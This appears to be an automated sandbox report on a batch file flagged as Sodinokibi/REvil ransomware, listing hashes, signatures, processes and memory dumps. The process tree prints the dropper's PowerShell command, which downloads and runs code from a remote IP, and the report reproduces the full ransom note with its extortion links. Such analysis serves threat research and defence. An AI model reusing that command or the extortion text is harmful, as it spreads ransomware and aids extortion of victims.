Overview

overview

10

Static

static

1c69f4f012...26.bat

windows7_x64

10

1c69f4f012...26.bat

windows10_x64

10

Analysis

  • max time kernel
    42s
  • max time network
    37s
  • platform
    windows7_x64
  • resource
    win7v200722
  • submitted
    22-08-2020 02:10

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1c69f4f012b140cb5a8804fe58a41126.bat

  • Size

    221B

  • MD5

    88eb700e439d918adcecb389a5bcf6b8

  • SHA1

    905eec03268857b86e52a8510eb71ca499d75361

  • SHA256

    a80c7d0195818572a4440425811e01f0f8259566df0d77c4ef7a928c64de77ce

  • SHA512

    6c1bbe97ea867f670d521a108db6fb0cbde85c34d10b53746b16514eaa58f8e96166e105a2d4d75bfe505af85635e4670bfbdf89f0789bfa5cebdc4bf53a4755

Score
10/10
ransomwaresodinokibipersistence

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/1c69f4f012b140cb5a8804fe58a41126

Extracted

Path

C:\bfu354-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension bfu354. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/140?s=61908812b95c5ff1176e968733afaf55 [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/46C78E03B01CE246 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/46C78E03B01CE246 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: Lv04kddxVJbN8MsIGZQYjEwYIObSUYpcXA24p3qJM8KZV2ejH9uLlyGAiL8JvIKq qub2KNA1gL2U3x61lXxFwuMMJeeC/Kqad9wqej+TJdXDqB6svZ5WppdSMiHoF2hl AHe2ioZO2bLNeISTVfoUHps2/oe3VCmpFB9jRRDu1d9xOqFQoP6vioQB0vaWBFvk BGsKfV3V6/6XRLT0gyBCvyd3Cv3wDOYck0ukOKf/ElwfbMd3uzpZBhYOU5E5G7Tr 1kT61pFbnQZOqmAjAjmkdoaJqXvM0AdF1eq4KkcU2PUqjlIvKmGAGv1bkk43YYAj Bcy+dAbNf9Rc6a+4n2e2T0caxp7JJqIK3VG9PagJsJXXAACewE4C5o8MdiVLlfka Oo4eYJSRVtUXscqKxQH6FRAYPBB9xMDrbcNAQSwnqVeEJf6PBQj1yqtaNugGSPvo VzK8yJlb5LwZGaswEi+aaAa+gNFBGleR7YNtr/l3fhzBGNK0PlZv+TSFazUBZbvh W+pjUZerjYn1AEoo/Vx72bwDLlMFGlBfbT99EbGF+s19ZyGLjpIPOJ9ZNA6mbg9+ kmR1AdUTuPBSktookTQ2t1kmhrvymKGb59z3lN7LR3F4yoVecm27l+bFXeEdPnK3 r1CMu4ugmjVbB5XNnHYy3mhIDinHjRdPMOlm9RQ2ZuJwPA9qsP1o3CT8jm2+NE47 nylvCCjxX6/12ZV8Axoh1noA2KKunUo+fNXpJsVUvU88rZUiI6USLAuINgXcqZMF aYXf/Wgr1+AC/BoDNIUrMP2jCgW4RSuksiJnkNJ6bvBv6Cvkas8rKd6zhOw/yPSH F/oxPfAEMNn5pAUO9mayGbLliKsec91I0se18zfqjJ9BCE0yAnSBkykmnBGexOP7 WHDHL4nqNRbQDXmSVF60zJ46DMejde2SjdWOIJ6/QcIFaDnDj85rB4JcPgQphxOJ DUpzebd9K989Ctg1DeY9t+1rJiFq88v4Y7tLL0O5CHsG2/K9h4iGE25iKlwpHQ88 EdiU7IItq8zInjtEkuJmhY9l3TpC3KLranZGI3m98jyQDT8QGSp2C4WDra7m/XsE l/O88Zj/kv0xrtMjAk9Uhvi7B05ksHq8tgBRpeM775ETgtWehvbmBB6A2W1BDbwE CR1TZjOuAPnWVMikpADmVSPBEjui0wAg6ICWIzvwhcQiOdvH4PaYFl+VoC5kDnbB cRJoXrrgkZ5XgeM8lvStAbfwxmSRIitg/38DzTbrzGtNlg8XLIRP51VvIvfIM4fS NiMiM1c+suyjAvQEiOi23xCd5QZurJ7W/8ShusJ6Edc= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/46C78E03B01CE246

http://decryptor.cc/46C78E03B01CE246

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

    ransomwaresodinokibi
  • Blacklisted process makes network request 1 IoCs
  • Modifies extensions of user files 6 IoCs

    Ransomware generally changes the extension on encrypted files.

    ransomware
  • Enumerates connected drives 3 TTPs
  • Modifies service 2 TTPs 5 IoCs
    persistence
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
    ransomware
  • Drops file in Program Files directory 24 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\1c69f4f012b140cb5a8804fe58a41126.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1156
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/1c69f4f012b140cb5a8804fe58a41126');Invoke-QVZIJBUKUSJYIH;Start-Sleep -s 10000"
      2⤵
      • Blacklisted process makes network request
      • Modifies extensions of user files
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1028
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Modifies service
    • Suspicious use of AdjustPrivilegeToken
    PID:1820

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1028-0-0x0000000000000000-mapping.dmp

    Download

  • memory/1028-1-0x0000000073910000-0x0000000073FFE000-memory.dmp

    Filesize

    6.9MB

    Download

  • memory/1028-2-0x0000000000970000-0x0000000000971000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1028-3-0x0000000004740000-0x0000000004741000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1028-4-0x0000000004590000-0x0000000004591000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1028-5-0x0000000005240000-0x0000000005241000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1028-8-0x00000000056A0000-0x00000000056A1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1028-13-0x0000000005730000-0x0000000005731000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1028-14-0x0000000006260000-0x0000000006261000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1028-21-0x00000000061B0000-0x00000000061B1000-memory.dmp

    Filesize

    4KB

    Download

  • memory/1028-22-0x00000000062F0000-0x00000000062F1000-memory.dmp

    Filesize

    4KB

    Download